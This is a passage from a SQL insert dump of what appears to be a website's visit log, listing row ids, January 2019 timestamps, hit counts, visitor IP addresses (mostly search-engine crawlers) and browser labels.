1,1,0,0,'95.163.255.106','other'),(372703,1547781534,1,1,0,0,'54.36.148.207','other'),(372704,1547781708,1,1,0,0,'209.17.96.202','other'),(372705,1547781772,1,1,0,0,'54.36.149.45','other'),(372706,1547782672,4,4,0,0,'216.244.66.241','other'),(372707,1547783249,1,1,0,0,'54.36.148.204','other'),(372708,1547783255,1,1,0,0,'46.229.168.136','other'),(372709,1547783257,1,1,0,0,'46.229.168.134','other'),(372710,1547783332,1,1,0,0,'66.249.69.149','chrome'),(372711,1547784010,1,1,0,0,'54.36.148.19','other'),(372712,1547784409,1,1,0,0,'216.244.66.241','other'),(372713,1547784897,1,1,0,0,'46.229.168.133','other'),(372714,1547784956,1,1,0,0,'54.36.149.105','other'),(372715,1547785175,1,1,0,0,'54.36.149.76','other'),(372716,1547785285,1,1,0,0,'54.36.148.95','other'),(372717,1547785299,5,5,0,0,'157.55.39.52','other'),(372718,1547785305,1,1,0,0,'40.77.167.34','other'),(372719,1547785309,5,5,0,0,'157.55.39.51','other'),(372720,1547785479,9,9,0,0,'216.244.66.241','other'),(372721,1547786064,1,1,0,0,'54.36.148.183','other'),(372722,1547786264,1,1,0,0,'8.29.198.27','other'),(372723,1547786626,7,7,0,0,'216.244.66.241','other'),(372724,1547786700,1,1,0,0,'54.36.148.188','other'),(372725,1547786769,1,1,0,0,'54.36.148.197','other'),(372726,1547787570,1,1,0,0,'8.29.198.26','other'),(372727,1547787609,1,1,0,0,'95.163.255.168','other'),(372728,1547787611,1,1,0,0,'95.163.255.193','other'),(372729,1547787711,1,1,0,0,'66.249.69.143','chrome'),(372730,1547787712,1,1,0,0,'66.249.69.148','chrome'),(372731,1547787891,1,1,0,0,'66.249.69.149','chrome'),(372732,1547788180,1,1,0,0,'66.249.69.144','chrome'),(372734,1547788329,5,5,0,0,'216.244.66.241','other'),(372735,1547788527,1,1,0,0,'66.249.69.145','chrome'),(372736,1547788528,1,1,0,0,'66.249.69.150','chrome'),(372737,1547788676,1,1,0,0,'46.229.168.132','other'),(372738,1547789041,1,1,0,0,'54.36.149.210','other'),(372739,1547789144,2,2,0,0,'95.108.213.4','other'),(372740,1547789190,1,1,0,0,'178.154.244.11','other'),(372741,1547789193,1,1,0,0,'46.229.168.134','other'),(372742,1547789218,1,1,0,0,'46.229.168.142','other'),(372743,1547789311,5,5,0,0,'216.244.66.241','other'),(372744,1547789352,4,4,0,0,'157.55.39.52','other'),(372745,1547789391,1,1,0,0,'54.36.149.66','other'),(372746,1547789482,1,1,0,0,'66.249.69.202','chrome'),(372747,1547789556,1,1,0,0,'5.45.207.19','other'),(372748,1547789617,1,1,0,0,'87.250.224.47','other'),(372749,1547789667,1,1,0,0,'54.36.149.30','other'),(372750,1547789671,1,1,0,0,'37.9.113.20','other'),(372751,1547789690,1,1,0,0,'66.249.69.217','chrome'),(372753,1547789695,1,1,0,0,'213.180.203.9','other'),(372754,1547789827,1,1,0,0,'54.36.149.93','other'),(372755,1547790059,1,1,0,0,'40.77.167.198','other'),(372756,1547790130,1,1,0,0,'87.250.224.65','other'),(372757,1547790211,1,1,0,0,'46.229.168.129','other'),(372758,1547790235,1,1,0,0,'216.244.66.241','other'),(372759,1547790343,1,1,0,0,'46.229.168.153','other'),(372760,1547790350,1,1,0,0,'54.36.149.62','other'),(372761,1547790453,1,1,0,0,'54.36.148.222','other'),(372762,1547791015,1,1,0,0,'66.249.75.16','chrome'),(372763,1547791016,1,1,0,0,'66.249.75.22','chrome'),(372764,1547791184,1,1,0,0,'216.244.66.241','other'),(372765,1547791293,1,1,0,0,'54.36.148.254','other'),(372766,1547791356,1,1,0,0,'46.229.168.132','other'),(372767,1547791792,2,2,0,0,'185.100.86.128','other'),(372768,1547791962,1,1,0,0,'157.55.39.52','other'),(372769,1547792288,6,6,0,0,'216.244.66.241','other'),(372770,1547792408,1,1,0,0,'40.77.167.34','other'),(372771,1547792556,1,1,0,0,'54.36.148.141','other'),(372772,1547792867,2,2,0,0,'66.249.69.144','chrome'),(372774,1547793233,1,1,0,0,'54.36.148.56','other'),(372775,1547793260,1,1,0,0,'54.36.148.142','other'),(372776,1547793880,1,1,0,0,'87.250.224.47','other'),(372777,1547793898,1,1,0,0,'40.77.167.34','other'),(372778,1547793957,6,6,0,0,'216.244.66.241','other'),(372779,1547794030,1,1,0,0,'66.249.69.148','chrome'),(372780,1547794221,1,1,0,0,'54.36.149.6','other'),(372781,1547794244,1,1,0,0,'5.45.207.19','other'),(372782,1547794312,2,2,0,0,'40.77.167.198','other'),(372783,1547794418,2,2,0,0,'92.113.5.28','chrome'),(372784,1547794838,1,1,0,0,'54.36.148.28','other'),(372785,1547794898,1,1,0,0,'66.249.69.150','chrome'),(372786,1547794939,3,3,0,0,'216.244.66.241','other'),(372787,1547795105,1,1,0,0,'91.196.178.161','chrome'),(372788,1547795353,1,1,0,0,'40.77.167.34','other'),(372789,1547795760,1,1,0,0,'54.36.148.223','other'),(372790,1547795806,2,2,0,0,'91.196.178.90','chrome'),(372791,1547795809,1,1,0,0,'46.229.168.145','other'),(372792,1547796154,1,1,0,0,'141.8.142.103','other'),(372793,1547796347,1,1,0,0,'66.249.69.204','chrome'),(372794,1547796474,1,1,0,0,'40.77.167.198','other'),(372795,1547796570,4,4,0,0,'91.196.177.207','chrome'),(372796,1547796592,1,1,0,0,'54.36.148.61','other'),(372797,1547796735,1,1,0,0,'46.229.168.150','other'),(372798,1547796769,1,1,0,0,'54.36.149.36','other'),(372799,1547796847,1,1,0,0,'54.36.148.176','other'),(372800,1547797069,1,1,0,0,'54.36.148.97','other'),(372801,1547797095,1,1,0,0,'8.29.198.27','other'),(372802,1547797102,1,1,0,0,'66.249.69.150','chrome'),(372803,1547797309,9,9,0,0,'216.244.66.241','other'),(372804,1547797508,1,1,0,0,'54.36.148.128','other'),(372805,1547797710,1,1,0,0,'66.249.69.202','chrome'),(372806,1547797845,1,1,0,0,'54.36.148.235','other'),(372807,1547798126,1,1,0,0,'66.249.69.204','chrome'),(372808,1547798443,1,1,0,0,'8.29.198.26','other'),(372809,1547798448,1,1,0,0,'54.36.149.32','other'),(372810,1547798456,1,1,0,0,'66.249.69.149','chrome'),(372811,1547798628,3,3,0,0,'178.154.244.11','other'),(372812,1547798932,1,1,0,0,'54.36.148.116','other'),(372813,1547798939,7,7,0,0,'91.196.178.90','firefox'),(372814,1547799007,1,1,0,0,'216.244.66.241','other'),(372815,1547799020,2,2,0,0,'5.45.207.19','other'),(372816,1547799057,1,1,0,0,'5.45.207.79','other'),(372817,1547799244,1,1,0,0,'141.8.142.103','other'),(372818,1547799442,2,2,0,0,'46.229.168.130','other'),(372819,1547799623,1,1,0,0,'207.46.13.194','other'),(372820,1547799664,1,1,0,0,'46.229.168.147','other'),(372821,1547799893,1,1,0,0,'91.196.178.90','firefox'),(372822,1547799980,1,1,0,0,'54.36.148.90','other'),(372823,1547800204,3,3,0,0,'66.249.69.149','chrome'),(372824,1547800323,6,6,0,0,'216.244.66.241','other'),(372825,1547800420,1,1,0,0,'193.107.170.71','chrome'),(372826,1547800527,3,3,0,0,'66.249.69.148','chrome'),(372827,1547800564,1,1,0,0,'180.76.15.138','other'),(372828,1547800637,1,1,0,0,'54.36.148.196','other'),(372829,1547800655,1,1,0,0,'40.77.167.34','other'),(372830,1547800777,1,1,0,0,'46.229.168.142','other'),(372831,1547800790,1,1,0,0,'54.36.149.98','other'),(372832,1547800908,3,3,0,0,'91.196.178.90','firefox'),(372833,1547800941,1,1,0,0,'52.114.75.71','other'),(372834,1547800957,1,1,0,0,'52.114.77.26','other'),(372835,1547801130,1,1,0,0,'54.36.148.162','other'),(372836,1547801187,1,1,0,0,'66.249.69.145','chrome'),(372837,1547801227,7,7,0,0,'216.244.66.241','other'),(372838,1547801315,1,1,0,0,'54.36.149.90','other'),(372839,1547801603,1,1,0,0,'66.249.69.143','chrome'),(372840,1547801604,1,1,0,0,'66.249.69.148','chrome'),(372841,1547801829,1,1,0,0,'66.249.69.200','chrome'),(372842,1547801939,1,1,0,0,'66.249.69.150','chrome'),(372843,1547802538,2,2,0,0,'91.196.177.46','chrome'),(372844,1547802700,1,1,0,0,'51.255.65.46','other'),(372845,1547802854,1,1,0,0,'54.36.149.43','other'),(372846,1547803022,1,1,0,0,'91.196.178.163','chrome'),(372847,1547803229,4,4,0,0,'216.244.66.241','other'),(372848,1547803725,1,1,0,0,'54.36.149.41','other'),(372849,1547803938,1,1,0,0,'95.163.255.92','other'),(372850,1547803941,1,1,0,0,'95.163.255.97','other'),(372851,1547804127,2,2,0,0,'66.249.69.150','chrome'),(372852,1547804410,1,1,0,0,'54.36.148.69','other'),(372853,1547804433,1,1,0,0,'66.249.69.144','chrome'),(372854,1547804458,8,8,0,0,'216.244.66.241','other'),(372855,1547804518,1,1,0,0,'91.196.178.163','chrome'),(372856,1547804705,1,1,0,0,'46.229.168.130','other'),(372857,1547804707,1,1,0,0,'46.229.168.144','other'),(372858,1547805041,1,1,0,0,'66.249.69.200','chrome'),(372859,1547805376,1,1,0,0,'54.36.149.106','other'),(372860,1547805767,1,1,0,0,'54.36.148.77','other'),(372861,1547805789,1,1,0,0,'54.36.148.161','other'),(372862,1547805917,1,1,0,0,'54.36.148.139','other'),(372863,1547806030,1,1,0,0,'66.249.69.200','chrome'),(372864,1547806039,10,10,0,0,'216.244.66.241','other'),(372865,1547806330,1,1,0,0,'109.173.57.189','chrome'),(372866,1547806347,1,1,0,0,'46.229.168.146','other'),(372867,1547806485,1,1,0,0,'54.36.148.27','other'),(372868,1547806618,1,1,0,0,'46.229.168.150','other'),(372869,1547806620,1,1,0,0,'46.229.168.130','other'),(372870,1547806764,1,1,0,0,'54.36.149.23','other'),(372871,1547807013,1,1,0,0,'31.184.238.190','chrome'),(372872,1547807015,1,1,0,0,'46.229.168.133','other'),(372873,1547807240,3,3,0,0,'216.244.66.241','other'),(372874,1547807356,2,2,0,0,'188.163.18.106','chrome'),(372875,1547807452,1,1,0,0,'54.36.148.45','other'),(372876,1547807519,1,1,0,0,'207.46.13.190','other'),(372877,1547807542,1,1,0,0,'54.36.148.178','other'),(372878,1547807614,1,1,0,0,'54.36.148.156','other'),(372879,1547807805,2,2,0,0,'40.77.167.34','other'),(372880,1547807865,1,1,0,0,'66.249.69.148','chrome'),(372881,1547807925,1,1,0,0,'8.29.198.27','other'),(372882,1547808434,1,1,0,0,'5.255.253.38','other'),(372883,1547808836,6,6,0,0,'216.244.66.241','other'),(372884,1547808945,1,1,0,0,'40.77.167.34','other'),(372885,1547809071,1,1,0,0,'54.36.148.28','other'),(372886,1547809171,1,1,0,0,'54.36.148.127','other'),(372887,1547809295,1,1,0,0,'8.29.198.26','other'),(372888,1547809781,1,1,0,0,'216.244.66.241','other'),(372889,1547809932,1,1,0,0,'54.36.148.39','other'),(372890,1547810141,2,2,0,0,'157.55.39.92','other'),(372891,1547810220,1,1,0,0,'31.184.238.56','chrome'),(372892,1547810240,1,1,0,0,'5.45.207.79','other'),(372893,1547810291,1,1,0,0,'141.8.142.103','other'),(372894,1547810676,1,1,0,0,'66.249.69.144','chrome'),(372895,1547810677,1,1,0,0,'66.249.69.149','chrome'),(372896,1547810785,2,2,0,0,'216.244.66.241','other'),(372897,1547811241,3,3,0,0,'195.69.223.246','chrome'),(372898,1547811388,1,1,0,0,'95.108.213.4','other'),(372899,1547811459,2,2,0,0,'178.154.244.11','other'),(372900,1547811488,2,2,0,0,'91.196.178.171','chrome'),(372901,1547811726,2,2,0,0,'216.244.66.241','other'),(372902,1547811763,1,1,0,0,'5.45.207.79','other'),(372903,1547811904,1,1,0,0,'95.163.255.97','other'),(372904,1547811966,2,2,0,0,'157.55.39.94','other'),(372905,1547812373,1,1,0,0,'178.154.244.11','other'),(372906,1547812557,1,1,0,0,'157.55.39.90','other'),(372907,1547812784,7,7,0,0,'216.244.66.241','other'),(372908,1547813113,2,2,0,0,'91.196.178.79','chrome'),(372909,1547813820,1,1,0,0,'54.36.148.56','other'),(372910,1547814468,1,1,0,0,'46.229.168.146','other'),(372911,1547814470,1,1,0,0,'46.229.168.148','other'),(372912,1547814475,9,9,0,0,'216.244.66.241','other'),(372913,1547814656,1,1,0,0,'54.36.148.69','other'),(372914,1547814704,1,1,0,0,'54.36.149.89','other'),(372915,1547814851,1,1,0,0,'95.134.243.105','chrome'),(372916,1547814935,1,1,0,0,'54.36.148.200','other'),(372917,1547814950,1,1,0,0,'54.36.149.84','other'),(372918,1547814960,1,1,0,0,'54.36.148.197','other'),(372919,1547815130,1,1,0,0,'46.229.168.134','other'),(372920,1547815299,1,1,0,0,'37.54.23.41','chrome'),(372921,1547815400,1,1,0,0,'157.55.39.90','other'),(372922,1547815519,5,5,0,0,'216.244.66.241','other'),(372923,1547815655,1,1,0,0,'54.36.149.78','other'),(372924,1547815838,1,1,0,0,'66.249.69.150','chrome'),(372925,1547815929,1,1,0,0,'54.36.148.178','other'),(372926,1547816040,1,1,0,0,'54.36.148.238','other'),(372927,1547816063,1,1,0,0,'5.45.207.19','other'),(372928,1547816155,1,1,0,0,'54.36.148.118','other'),(372929,1547816200,138,138,0,0,'69.30.213.202','other'),(372930,1547816510,1,1,0,0,'40.77.167.136','other'),(372931,1547816520,1,1,0,0,'54.36.148.86','other'),(372932,1547816597,1,1,0,0,'54.36.148.153','other'),(372933,1547816735,1,1,0,0,'66.249.69.149','chrome'),(372934,1547816893,2,2,0,0,'157.55.39.92','other'),(372935,1547817011,1,1,0,0,'46.133.112.129','chrome'),(372936,1547817076,1,1,0,0,'54.36.149.75','other'),(372937,1547817485,1,1,0,0,'54.36.148.15','other'),(372938,1547817529,9,9,0,0,'216.244.66.241','other'),(372939,1547817569,1,1,0,0,'13.66.139.0','other'),(372940,1547817777,3,3,0,0,'91.124.182.170','firefox'),(372941,1547817842,1,1,0,0,'40.77.167.136','other'),(372942,1547817875,1,1,0,0,'207.46.13.223','other'),(372943,1547817926,2,2,0,0,'91.196.177.46','firefox'),(372944,1547817930,2,2,0,0,'87.250.224.47','other'),(372945,1547817936,1,1,0,0,'5.45.207.19','other'),(372946,1547818083,3,3,0,0,'37.53.89.92','chrome'),(372947,1547818107,3,3,0,0,'5.45.207.79','other'),(372948,1547818217,1,1,0,0,'46.229.168.148','other'),(372949,1547818243,1,1,0,0,'178.154.244.11','other'),(372950,1547818318,2,2,0,0,'46.201.55.181','firefox'),(372951,1547818320,1,1,0,0,'66.249.69.150','chrome'),(372952,1547818346,1,1,0,0,'46.229.168.151','other'),(372953,1547818412,1,1,0,0,'66.249.69.145','chrome'),(372954,1547818487,1,1,0,0,'66.249.69.149','chrome'),(372955,1547818524,2,2,0,0,'66.249.69.204','chrome'),(372956,1547818573,3,3,0,0,'157.55.39.92','other'),(372957,1547818622,1,1,0,0,'66.249.69.200','chrome'),(372958,1547818783,1,1,0,0,'8.29.198.25','other'),(372959,1547818845,2,2,0,0,'5.45.207.19','other'),(372960,1547818877,1,1,0,0,'87.250.224.65','other'),(372961,1547818924,1,1,0,0,'207.46.13.223','other'),(372962,1547819152,2,2,0,0,'95.132.54.95','firefox'),(372963,1547819196,1,1,0,0,'91.196.178.90','firefox'),(372964,1547819216,1,1,0,0,'66.249.69.221','chrome'),(372965,1547819245,1,1,0,0,'5.45.207.79','other'),(372966,1547819447,1,1,0,0,'54.36.149.12','other'),(372967,1547819691,1,1,0,0,'54.36.148.93','other'),(372968,1547819780,1,1,0,0,'54.36.149.45','other'),(372969,1547819825,1,1,0,0,'66.249.69.202','chrome'),(372970,1547819830,2,2,0,0,'66.249.69.200','chrome'),(372971,1547819930,1,1,0,0,'54.36.148.253','other'),(372972,1547820105,4,4,0,0,'216.244.66.241','other'),(372973,1547820152,1,1,0,0,'8.29.198.26','other'),(372974,1547820205,1,1,0,0,'54.36.148.59','other'),(372975,1547820293,1,1,0,0,'66.249.69.145','chrome'),(372976,1547820294,1,1,0,0,'66.249.69.150','chrome'),(372977,1547820303,1,1,0,0,'40.77.167.136','other'),(372978,1547820358,1,1,0,0,'46.229.168.150','other'),(372979,1547820395,1,1,0,0,'157.55.39.92','other'),(372980,1547820429,1,1,0,0,'91.124.182.170','firefox'),(372981,1547820783,1,1,0,0,'54.36.148.161','other'),(372982,1547820813,2,2,0,0,'94.154.222.14','firefox'),(372983,1547821250,7,7,0,0,'216.244.66.241','other'),(372984,1547821290,1,1,0,0,'54.36.149.94','other'),(372985,1547821291,1,1,0,0,'54.36.148.243','other'),(372986,1547821437,1,1,0,0,'37.53.123.48','chrome'),(372987,1547821733,1,1,0,0,'54.36.149.39','other'),(372988,1547821770,1,1,0,0,'54.36.148.106','other'),(372989,1547821973,1,1,0,0,'54.36.148.32','other'),(372990,1547822012,1,1,0,0,'54.36.149.86','other'),(372991,1547822196,2,2,0,0,'157.55.39.92','other'),(372992,1547822297,56,56,0,0,'46.4.106.120','other'),(372993,1547822351,1,1,0,0,'40.77.167.136','other'),(372994,1547822432,2,2,0,0,'130.180.209.46','chrome'),(372995,1547822593,1,1,0,0,'54.36.149.74','other'),(372996,1547822660,1,1,0,0,'207.46.13.223','other'),(372997,1547822962,4,4,0,0,'216.244.66.241','other'),(372998,1547823079,1,1,0,0,'95.163.255.95','other'),(372999,1547823199,1,1,0,0,'54.36.148.49','other'),(373000,1547823685,2,2,0,0,'157.55.39.92','other'),(373001,1547823867,1,1,0,0,'54.36.148.69','other'),(373002,1547823922,6,6,0,0,'216.244.66.241','other'),(373003,1547823978,1,1,0,0,'66.249.69.200','chrome'),(373004,1547823986,1,1,0,0,'54.36.148.194','other'),(373005,1547824111,2,2,0,0,'66.249.69.144','chrome'),(373006,1547824112,1,1,0,0,'66.249.69.150','chrome'),(373007,1547824759,1,1,0,0,'54.36.148.65','other'),(373008,1547824801,1,1,0,0,'207.46.13.223','other'),(373009,1547824889,1,1,0,0,'66.249.69.149','chrome'),(373010,1547824943,1,1,0,0,'66.102.9.62','chrome'),(373011,1547825243,1,1,0,0,'54.36.148.121','other'),(373012,1547825281,1,1,0,0,'54.36.148.204','other'),(373013,1547825311,1,1,0,0,'66.249.69.144','chrome'),(373014,1547825313,1,1,0,0,'66.249.69.148','chrome'),(373015,1547825374,1,1,0,0,'157.55.39.92','other'),(373016,1547825532,1,1,0,0,'40.77.167.136','other'),(373017,1547825603,1,1,0,0,'54.36.149.71','other'),(373018,1547825613,1,1,0,0,'37.73.50.248','other'),(373019,1547825624,1,1,0,0,'91.196.178.52','chrome'),(373020,1547825648,1,1,0,0,'54.36.148.185','other'),(373021,1547825746,6,6,0,0,'216.244.66.241','other'),(373022,1547825863,2,2,0,0,'66.249.75.20','chrome'),(373023,1547826115,1,1,0,0,'54.36.148.59','other'),(373024,1547826302,1,1,0,0,'46.229.168.129','other'),(373025,1547826348,1,1,0,0,'54.36.148.151','other'),(373026,1547826397,1,1,0,0,'66.249.75.15','chrome'),(373027,1547826592,1,1,0,0,'207.46.13.223','other'),(373028,1547826903,1,1,0,0,'54.36.149.63','other'),(373029,1547826920,1,1,0,0,'54.36.148.19','other'),(373030,1547826993,3,3,0,0,'216.244.66.241','other'),(373031,1547827120,1,1,0,0,'66.249.75.16','chrome'),(373032,1547827121,2,2,0,0,'66.249.75.22','chrome'),(373033,1547827323,1,1,0,0,'46.229.168.152','other'),(373034,1547827380,1,1,0,0,'46.229.168.135','other'),(373035,1547827486,1,1,0,0,'66.249.69.200','chrome'),(373036,1547827540,1,1,0,0,'46.229.168.132','other'),(373037,1547827656,1,1,0,0,'54.36.149.38','other'),(373038,1547827797,1,1,0,0,'66.249.69.202','chrome'),(373039,1547827915,1,1,0,0,'54.36.149.1','other'),(373040,1547827958,1,1,0,0,'207.46.13.223','other'),(373041,1547828214,1,1,0,0,'54.36.148.45','other'),(373042,1547828301,1,1,0,0,'66.249.75.22','chrome'),(373043,1547828442,2,2,0,0,'5.45.207.19','other'),(373044,1547828550,3,3,0,0,'216.244.66.241','other'),(373045,1547828588,1,1,0,0,'54.36.148.132','other'),(373046,1547829256,1,1,0,0,'54.36.149.2','other'),(373047,1547829389,1,1,0,0,'46.229.168.149','other'),(373048,1547829391,1,1,0,0,'46.229.168.132','other'),(373049,1547829482,5,5,0,0,'216.244.66.241','other'),(373050,1547829632,1,1,0,0,'8.29.198.25','other'),(373051,1547829730,1,1,0,0,'54.36.148.133','other'),(373052,1547829963,1,1,0,0,'95.163.255.96','other'),(373053,1547829965,1,1,0,0,'95.163.255.97','other'),(373054,1547829967,1,1,0,0,'95.163.255.93','other'),(373055,1547829980,3,3,0,0,'5.45.207.79','other'),(373056,1547830194,1,1,0,0,'54.36.148.232','other'),(373057,1547830206,1,1,0,0,'54.36.148.219','other'),(373058,1547830266,2,2,0,0,'52.214.133.9','chrome'),(373059,1547830340,1,1,0,0,'54.36.149.78','other'),(373060,1547830386,4,4,0,0,'216.244.66.241','other'),(373061,1547830417,1,1,0,0,'37.9.113.103','other'),(373062,1547830534,1,1,0,0,'157.55.39.92','other'),(373063,1547830735,1,1,0,0,'66.249.75.20','chrome'),(373064,1547830853,1,1,0,0,'46.229.168.145','other'),(373065,1547830854,1,1,0,0,'46.229.168.130','other'),(373066,1547831020,1,1,0,0,'8.29.198.26','other'),(373067,1547831314,1,1,0,0,'66.249.75.21','chrome'),(373068,1547831369,2,2,0,0,'157.55.39.90','other'),(373069,1547831380,8,8,0,0,'216.244.66.241','other'),(373070,1547831458,1,1,0,0,'5.45.207.19','other'),(373071,1547831663,1,1,0,0,'5.45.207.79','other'),(373072,1547831822,1,1,0,0,'66.102.9.40','chrome'),(373074,1547831886,1,1,0,0,'178.154.244.11','other'),(373075,1547832366,5,5,0,0,'216.244.66.241','other'),(373076,1547832966,1,1,0,0,'207.46.13.223','other'),(373077,1547833392,1,1,0,0,'54.36.148.203','other'),(373078,1547834152,1,1,0,0,'54.36.148.125','other'),(373079,1547834160,1,1,0,0,'207.46.13.223','other'),(373080,1547834186,5,5,0,0,'216.244.66.241','other'),(373081,1547834242,1,1,0,0,'46.229.168.129','other'),(373082,1547834647,1,1,0,0,'54.36.149.17','other'),(373083,1547834661,1,1,0,0,'66.249.75.22','chrome'),(373084,1547834709,2,2,0,0,'207.46.13.216','other'),(373085,1547835064,1,1,0,0,'54.36.148.66','other'),(373086,1547835217,1,1,0,0,'207.46.13.223','other'),(373087,1547835348,2,2,0,0,'216.244.66.241','other'),(373088,1547835360,1,1,0,0,'66.249.75.21','chrome'),(373089,1547835950,1,1,0,0,'54.36.148.94','other'),(373090,1547836456,1,1,0,0,'54.36.148.181','other'),(373091,1547836573,1,1,0,0,'207.46.13.223','other'),(373092,1547836596,1,1,0,0,'54.36.148.197','other'),(373093,1547836732,1,1,0,0,'66.249.75.20','chrome'),(373094,1547836977,4,4,0,0,'216.244.66.241','other'),(373095,1547837041,1,1,0,0,'54.36.149.13','other'),(373096,1547837103,1,1,0,0,'51.255.65.46','other'),(373097,1547837493,1,1,0,0,'54.36.149.58','other'),(373098,1547837727,1,1,0,0,'66.249.69.204','chrome'),(373099,1547837766,1,1,0,0,'54.36.149.104','other'),(373100,1547837846,1,1,0,0,'66.249.69.200','chrome'),(373101,1547837931,4,4,0,0,'216.244.66.241','other'),(373102,1547838258,2,2,0,0,'207.46.13.216','other'),(373103,1547838452,1,1,0,0,'46.229.168.148','other'),(373104,1547838540,2,2,0,0,'66.249.75.21','chrome'),(373105,1547838624,1,1,0,0,'46.229.168.132','other'),(373106,1547838819,1,1,0,0,'54.36.148.22','other'),(373107,1547839104,1,1,0,0,'54.36.148.155','other'),(373108,1547839176,1,1,0,0,'54.36.148.103','other'),(373109,1547839186,1,1,0,0,'54.36.148.19','other'),(373110,1547839382,1,1,0,0,'54.36.148.186','other'),(373111,1547839655,1,1,0,0,'54.36.149.60','other'),(373112,1547839703,1,1,0,0,'54.36.148.11','other'),(373113,1547839747,14,14,0,0,'216.244.66.241','other'),(373114,1547840077,1,1,0,0,'54.36.149.40','other'),(373115,1547840101,1,1,0,0,'66.249.69.204','chrome'),(373116,1547840469,1,1,0,0,'8.29.198.27','other'),(373117,1547840519,2,2,0,0,'157.55.39.221','other'),(373118,1547840539,1,1,0,0,'95.163.255.113','other'),(373119,1547840572,1,1,0,0,'213.180.203.17','other'),(373120,1547840649,1,1,0,0,'178.154.244.65','other'),(373121,1547840692,1,1,0,0,'95.163.255.116','other'),(373122,1547840722,1,1,0,0,'87.250.224.118','other'),(373123,1547840764,1,1,0,0,'157.55.39.74','other'),(373124,1547840831,5,5,0,0,'216.244.66.241','other'),(373125,1547840956,1,1,0,0,'178.154.200.48','other'),(373126,1547841005,1,1,0,0,'213.180.203.9','other'),(373127,1547841169,1,1,0,0,'54.36.149.72','other'),(373128,1547841229,2,2,0,0,'178.154.171.27','other'),(373129,1547841878,1,1,0,0,'8.29.198.25','other'),(373130,1547842009,1,1,0,0,'157.55.39.74','other'),(373131,1547842039,1,1,0,0,'178.154.171.17','other'),(373132,1547842209,1,1,0,0,'66.249.75.17','chrome'),(373133,1547842221,1,1,0,0,'66.249.75.21','chrome'),(373134,1547842240,2,2,0,0,'66.249.75.20','chrome'),(373135,1547842354,1,1,0,0,'54.36.148.195','other'),(373136,1547842382,1,1,0,0,'54.36.148.146','other'),(373137,1547842436,1,1,0,0,'66.249.69.202','chrome'),(373138,1547842538,4,4,0,0,'216.244.66.241','other'),(373139,1547842579,1,1,0,0,'46.188.107.155','msie'),(373140,1547842853,1,1,0,0,'54.36.148.30','other'),(373141,1547842917,1,1,0,0,'178.154.244.11','other'),(373142,1547843298,1,1,0,0,'66.249.75.16','chrome'),(373143,1547843350,2,2,0,0,'66.249.75.20','chrome'),(373144,1547843354,1,1,0,0,'54.36.149.10','other'),(373145,1547843477,5,5,0,0,'216.244.66.241','other'),(373146,1547843689,1,1,0,0,'157.55.39.74','other'),(373147,1547843808,1,1,0,0,'54.36.148.202','other'),(373148,1547844086,1,1,0,0,'157.55.39.229','other'),(373149,1547844176,1,1,0,0,'46.229.168.151','other'),(373150,1547844178,1,1,0,0,'46.229.168.136','other'),(373151,1547844269,1,1,0,0,'46.229.168.141','other'),(373152,1547844617,1,1,0,0,'157.55.39.221','other'),(373153,1547844856,1,1,0,0,'54.36.149.95','other'),(373154,1547845088,1,1,0,0,'178.137.86.2','other'),(373155,1547845350,4,4,0,0,'216.244.66.241','other'),(373156,1547845445,1,1,0,0,'66.249.69.202','chrome'),(373157,1547845715,1,1,0,0,'54.36.149.26','other'),(373158,1547845812,1,1,0,0,'54.36.149.58','other'),(373159,1547845960,1,1,0,0,'66.249.75.20','chrome'),(373160,1547846048,1,1,0,0,'157.55.39.221','other'),(373161,1547846191,1,1,0,0,'54.36.148.147','other'),(373162,1547846336,1,1,0,0,'66.249.69.219','chrome'),(373163,1547846337,2,2,0,0,'66.249.69.200','chrome'),(373164,1547846573,1,1,0,0,'66.249.75.17','chrome'),(373165,1547846574,1,1,0,0,'66.249.75.21','chrome'),(373166,1547846591,1,1,0,0,'66.249.69.202','chrome'),(373167,1547846842,4,4,0,0,'216.244.66.241','other'),(373168,1547847112,2,2,0,0,'66.249.75.22','chrome'),(373169,1547847331,1,1,0,0,'54.36.149.75','other'),(373170,1547847902,3,3,0,0,'157.55.39.74','other'),(373171,1547847930,1,1,0,0,'54.36.149.73','other'),(373172,1547848039,1,1,0,0,'157.55.39.229','other'),(373173,1547848136,13,13,0,0,'216.244.66.241','other'),(373174,1547848215,1,1,0,0,'54.36.149.6','other'),(373175,1547848259,1,1,0,0,'66.249.75.22','chrome'),(373176,1547848406,1,1,0,0,'157.55.39.221','other'),(373177,1547848494,1,1,0,0,'46.229.168.151','other'),(373178,1547848639,1,1,0,0,'66.249.75.17','chrome'),(373179,1547848640,2,2,0,0,'66.249.75.21','chrome'),(373180,1547849092,1,1,0,0,'54.36.149.70','other'),(373181,1547849280,2,2,0,0,'216.244.66.241','other'),(373182,1547849590,1,1,0,0,'46.229.168.134','other'),(373183,1547849636,1,1,0,0,'54.36.149.71','other'),(373184,1547850438,1,1,0,0,'180.76.15.32','other'),(373185,1547850676,1,1,0,0,'66.249.75.21','chrome'),(373186,1547850783,1,1,0,0,'178.154.244.11','other'),(373187,1547850817,1,1,0,0,'54.36.148.238','other'),(373188,1547850818,2,2,0,0,'141.8.142.103','other'),(373189,1547850883,1,1,0,0,'157.55.39.221','other'),(373190,1547850930,12,12,0,0,'216.244.66.241','other'),(373191,1547851246,1,1,0,0,'54.36.148.69','other'),(373192,1547851313,1,1,0,0,'8.29.198.25','other'),(373193,1547852065,1,1,0,0,'5.45.207.79','other'),(373194,1547852689,1,1,0,0,'66.249.75.21','chrome'),(373195,1547852716,1,1,0,0,'8.29.198.27','other'),(373196,1547852895,1,1,0,0,'46.229.168.137','other'),(373197,1547853466,1,1,0,0,'54.36.148.186','other'),(373198,1547853669,1,1,0,0,'46.229.168.148','other'),(373199,1547853670,1,1,0,0,'66.249.75.22','chrome'),(373200,1547853717,5,5,0,0,'216.244.66.241','other'),(373201,1547853762,1,1,0,0,'54.36.148.14','other'),(373202,1547854247,1,1,0,0,'207.46.13.147','other'),(373203,1547854435,1,1,0,0,'54.36.148.49','other'),(373204,1547854621,1,1,0,0,'54.36.149.72','other'),(373205,1547854733,1,1,0,0,'95.108.213.4','other'),(373206,1547854832,1,1,0,0,'207.46.13.149','other'),(373207,1547854903,1,1,0,0,'46.229.168.143','other'),(373208,1547854933,1,1,0,0,'95.163.255.103','other'),(373209,1547855009,1,1,0,0,'54.36.149.53','other'),(373210,1547855042,1,1,0,0,'95.163.255.109','other'),(373211,1547855054,1,1,0,0,'54.36.148.146','other'),(373212,1547855106,2,2,0,0,'95.163.255.113','other'),(373213,1547855187,1,1,0,0,'95.163.255.118','other'),(373214,1547855191,1,1,0,0,'66.249.69.202','chrome'),(